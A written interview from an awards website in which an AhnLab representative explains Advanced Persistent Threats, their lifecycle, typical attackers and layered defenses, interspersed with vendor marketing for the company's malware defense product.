Get Your Golden Bridge Awards Entry Kit Now
Welcome How To Submit Enter Online Advertisements & Sponsorships Tickets Volunteer as Judge Merchandise Winners Home
Tom Hance: What are Advanced Persistent Threats?

AhnLab creates agile, integrated Internet security solutions for businesses and governments, AhnLab is the first and to date only security company to offer a Network and Host based solution against Advanced Malware and APTs. By combining deep behavioral analysis, dynamic content inspection and endpoint and server protection, AhnLab generates best-of-breed breach detection and threat prevention that scales easily for the largest high-speed networks. This multi-dimensional analysis approach is combined with exceptional service to create truly global protection against attacks that evade traditional security defenses and first generation APT sandboxes. That's why more than 25,000 organizations rely on AhnLab's award-winning products and services to make the Internet safe and reliable for businesses.

Rake Narang: What is an APT? Can you give us a brief history of APTs?

Tom Hance:An APT, or Advanced Persistent Threat, is a malware type that can wreak havoc on computers, networks and entire organizations. APTs are extended campaigns often targeted at specific organizations, or groups of organizations, or at specific data to achieve a clear objective.  They are well-researched and highly coordinated attacks. They’re designed to circumvent virtually all traditional defense mechanisms.  APTs typically blend a broad range of tools and have a very specific objective such as theft of intellectual property or financial gain.

It helps to look at each word in the acronym helps to better understand APTs:

  • Advanced - the attacker has significant technical capabilities to exploit vulnerabilities in the target
  • Persistent – APTs occur over an extended period of time, sometimes over the course of years
  • Threat –  in order for there to be a threat, there must be an attacker with both the motivation and ability to perform a successful attack.

APTs are considered successful with valuable information is exfiltrated from the network to criminal or state elements or when the Advanced Persistent Threat opens opportunity for other sophisticated malware; targeted attacks, ROP or Return Oriented Programming attacks with the similar financial or reputation gain objectives.  No sectors of industry are immune from targeted threats and APTs. In 2011, the most prevalent targets were the government and public sector, manufacturing, and finance.
Decades ago, in the 80’s, the worm worked its way from machine to machine, infecting computers one at a time. Famous early APTs included the LOVEBUG email virus, NIMDA (which became the most widely spread virus in just 22 minutes) and SQL Slammer.  In 2012, APT attack techniques evolved further to disguise executable files with common application icons, like a Word .doc file or help files. The type of and number of analyses done on a file depends on the file type.

About Tom Hance

Rake Narang: What are the characteristics of an APT and its life cycle?

Tom Hance: APTs use a range of tools, from common malware and social engineering to complex zero-day attack tactics to achieve their goals.  They typically progress through a series of stages as they develop and spread, for example:

  • Reconnaissance: Attackers research and identify their targets.
  • Intrusion: Spear-phishing e-mails target specific users within the target company with spoofed messages that include malicious links or malicious PDF or Microsoft Office document attachments.
  • Establishing a backdoor: Attackers try to get domain administrative credentials and extract them from the network.
  • Obtaining user credentials: Attackers gain access using stolen, valid user credentials.
  • Installing utilities: Programs installed on the target network install backdoors, grab passwords, steal email, and other tasks.
  • Privilege escalation, lateral movement, and data exfiltration: Attackers grab e-mails, attachments, and files from servers.
  • Maintaining persistence: If the attackers find they are being detected or remediated, they use other methods, including revamping their malware, to ensure they don’t lose their presence in the victim’s network.

Some of the above steps are iterative, particularly the last two. Almost all APT attacks begin at the client, the part of your network that connects to more parts of the Internet than any other. Simply visiting a website or viewing an HTML e-mail message can initiate what we call the “drive-by download.”  Along with web and e-mail-based delivery of malicious code, clients can also be infected via the illegal download of pirated software, music, and video files.  Servers, portable media, social networks, insider threats and wireless networks also pose serious APT and advanced malware risks.

Rake Narang: Who is behind most APTs and what resources do they have to be both advanced and persistent?

Tom Hance: It takes a special talent with a highly focused agenda to launch a targeted attack. Many of the individuals and organizations behind APTs, Trojans and botnets are highly paid professionals. And they are good at covering their tracks and their geographic source. China, Russia, Eastern Europe, are often home of the originators.  The creators of APTs may have goals in writing their destructive code such as industrial espionage, monetary theft or disabling an organization’s networks for financial or political gain.

Looking back at some recent notorious APTs -- Ghostnet was a botnet deployed to monitor the Dalai Lama’s agenda, Operation Aurora monitored Chinese dissidents’ Gmail accounts, Shady RAT was a botnet with government and global corporate targets, and Stuxnet attempted to disrupt Iran’s uranium enrichment program.

These malware creators have sophisticated corporate organizations backing their efforts and top-tier talent at their disposal. Some are even sponsored — and protected — by the governments of the countries in which they operate. At the same time, many other targeted attacks are organized by rank amateurs who deconstruct professionally built malware such as Stuxnet. Other amateurs use do-it-yourself kits purchased over the Internet for a few hundred dollars. The kits quickly generate thousands of new, untraceable malware variants and even have multi-language versions, technical support, and money-back guarantees. Someone with only a minimal understanding of malware and the Internet can join an existing criminal network for profit or sponsor his or her own within minutes. It’s so widespread that marketing programs help structure any budding online mobster’s financial success.  As I mentioned earlier, mischief isn’t what makes these criminals tick. Profit, money, intellectual property, identity information are the driving factors.

Rake Narang: What is the best defense against APTs?

Tom Hance: You need a well-planned defensive strategy to protect your organization from these sophisticated attacks. Despite these escalating threats, most organizations continue to respond with conventional security solutions, such as antivirus solutions, intrusion detection/prevention systems, next-generation firewalls, and web application firewalls. These organizations are limited by the time required to perform multidimensional threat analysis, the inability of these devices to perform this analysis, and the lack of an automated response to identified threats. Suffice it to say that traditional approaches are ineffective against today’s more sophisticated attacks. These approaches just weren’t designed to stop these threats.

The best defense is multi-dimensional, that encompasses signature, behavior and dynamic content analysis at both the network and end-point level to detect advanced malware. You must protect all doors, which is to say that optimally you’ll want file-share and email protection integrated into your defense strategy. To detect malware at at both the network ingress and egress points, between internal enclaves and at the host level you’ll need you’ll need a highly integrated solution. A local agent that blocks code execution and analyzes malware, blocking potentially harmful APTs at the host level is critical. White lists, black lists, and signatures help as a good first filter, or what we consider “fast path technologies” to take down the easy stuff.  This frees up resources to focus on more sophisticated objects.  This kind of   approach protects everything – networks, servers, endpoints and cloud resources.

On top of all this, user training is essential.  Social engineering tricks, and spear phishing attacks can partially be thwarted when users are trained what to look for. In a survey we conducted, we found that almost 68% of trained security professionals have plugged in a found USB drive into their laptops! It only takes one click to invite the criminal element into your network.  Providing a general understanding of what not to do when on-line and a comprehensive network and host prevention solution will result in a more powerful protection for your network.

Company: AhnLab, Inc.
2310 Walsh Avenue, Santa Clara, CA 95051 U.S.A.

Founded in: 2013
CEO: Philip Kim
Public or Private: Private
Head Office in Country: United States
Products and Services: AhnLab USA is a leading provider of information security products and services for enterprise and government organizations. AhnLab USA security products protect the world from sophisticated malware and Advanced Persistent Threat attacks. AhnLab’s Malware Defense System is the first fully integrated system to allow simultaneous and instant protection of critical data assets at the network perimeter, for internal network boundaries and at the network end-points. AhnLab MDS stops sophisticated never seen before attacks with powerful layered protection for web, email and file-share traffic in a single, lightening fast appliance ideal for 100Mbps, 1Gig and 10Gig boundary applications. The MDS works fluidly with AhnLab's optional MDS Client Agent to protect endpoints from rouge and BYOD level infections.

Company’s Goals: To become the leading US provider of enterprise strength security solutions against advanced malware.
Key Words:
Advanced Persistent Threats, DDoS attacks, Zero Day Exploits, APTs, MDS, Malware Defense System, AhnLab MDS, advanced malware
Interested in doing a written interview with us?

Let's do a quick written interview. Let's share success stories. Let's connect.


San Madan

san [@] goldenbridgeawards [dot] com
Connect with me on LinkedIn

Click here now to see the interview questions.